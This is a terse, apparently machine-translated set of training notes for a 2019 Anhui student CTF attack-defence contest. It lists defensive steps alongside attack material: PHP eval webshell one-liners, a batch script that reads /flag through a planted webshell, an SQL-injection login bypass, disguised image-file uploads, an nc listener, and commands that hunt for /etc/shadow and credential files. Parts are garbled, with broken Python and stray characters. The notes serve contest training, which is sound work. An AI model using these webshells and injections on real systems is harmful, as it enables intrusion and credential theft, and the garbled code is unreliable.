2019年安徽省大学生ネット攻防試合前トレーニング——Day 2

4879 ワード

AWD(高職グループ)試合構想(実験室楊旭先輩の記録に由来)
  • トラフィック分析仮想マシン、トラフィックファイルをダウンロードしてデータ分析を行う(可能)*
  • flag更新
  • flagが取られ、このチームは減点され、攻撃者の得点は
  • だった.
  • 主催者はチームのサーバーをcheckし、減点した.得点は他のチームが
  • 点を分けた.
  • データベースパスワード
  • データベース(database-con栖g.php)
  • /etc/redis/redis.conf
  • tomacat-user.xml
  • webpass.

  • ユーザ、ディレクトリ、ポート、プロセス情報(権限付与)(ps,netstat-anptu,top,/etc/issue)
  • サイトバックドア、webログ(get,)、agログ、history、(バックアップサイト)
  • バックアップとリカバリ(ソースコードの削除)
  • tar-czfディレクトリ
  • ローカル
  • へのバックアップ
  • wafの作成
  • データ洗浄とログ情報
  • を作成する.
  • ファイルとプロセスモニタリング
  • ファイルモニタリング(pythonスクリプト、栖lecmp、shutil、os)
  • プロセスモニタ

  • サービスパスワードを変更し、サービス外部接続
  • を制約する
  • 現在のsshユーザホーム
  • を同期する.
  • seesionsファイル、tmpディレクトリ
  • を定期的にクリーンアップ
  • サービス弱パスワード
  • 主催者裏口
  • cmsバージョン番号を決定し、exploitを検索して
  • を利用する
  • 一言木馬(ipを制限し、D盾に検出されないようにする)
  • Linuxベース
  • grep -nir “eval”/var/www/html
  • ps -ef |grep httpd
  • echo -e “\oldpasswdnewpasswdnewpasswd” | passwd
  • ps -u apache -o user,pid
  • contrab-r//自動化タスク
  • の削除
  • 共通スクリプト
  • phpプログラムスクリプト
  • wafロード/アンインストールプログラム(フィルタ)
  • ファイルモニタ
  • プロセスモニタ
  • 一括攻撃スクリプト
  • webshell管理システム
  • macアドレスバインド
  • 脆弱性(sql+ファイルアップロード+ファイル解析脆弱性)
  • は権限(権利付与)を維持し、強化する.nc-lvvp 9999サーバの権限cp
    import requests
    for i in range():  
        ip = ???    
        try:        
            req = requests.get(url)        
            print(ip,req.text)    
        expect:        
            psss 
    eval(_$GET[PASS]) 
    requests.get(url+?PASS=system("cat /flag"))
    
  • ファイルにはinclude(必要がなければ直接濾過)
  • check_login($userはSqlクエリ文に直接接続され、フィルタは厳密ではありません)
  • 越権
  • アップロードファイル(厳密、検証接尾辞、アップロードファイル機能削除)
  • extract($_REQUEST); a(a(_post(‘b’))一言木馬(コード注入)
  • 論理脆弱性:admin 111検証コードが正しい(検証コードが更新されず変化しない)post注入sqlmap-r sql.txt--dbs(爆庫)
  • CFS総合ターゲット競技(学部組)試合
  • ネットワークトポロジ
  •          
       IP:172.24.10.x(255.255.255.0)          1      
             1:172.24.10.x(255.255.255.0) 
                 2:172.24.11.x(255.255.255.0)
             1:172.24.11.x(255.255.255.0)
                 2:172.24.12.x(255.255.255.0)
             1:172.24.12.x(255.255.255.0)
    

    1層目のターゲットに攻め込んだ後、1層目のターゲットにエージェントとして2台目のターゲットに順次アクセスする
    攻撃の構想.
  • nmap走査nmap-a-sVip
  • スキャンバックグラウンド
  • 御剣
  • dirsearch(python dirsearch.py -u “URL” )

  • ログインインタフェース試行sql注入(万能パスワードadmin’#)
  • webshellアップロード
  • アップロードディレクトリ(スキャンされたバックグラウンドに注意)
  • を探します
  • 伝画像馬1.jpg.php等
  • phpinfo()をテストします.
  • 一言木馬
  •  phpinfo(); eval($_POST["PASS"]) ;?> 
    

    中国包丁でつなぐ
  • flagの一般的なflagの位置を探します
  • /
  • /etc/passwd
  • /etc/shadow
  • grep “flag” -R/
  • Webサイトバックグラウンド
  • http sshなどのプロファイル
  • crontab
  • データベース
  • Webサイトのプロファイル:config.php
  • デスクトップトラフィックパケット起動項目SAMパスワードファイルログファイル(windows)
  • 権利付与スクリプトおよびプロキシスクリプトを収集する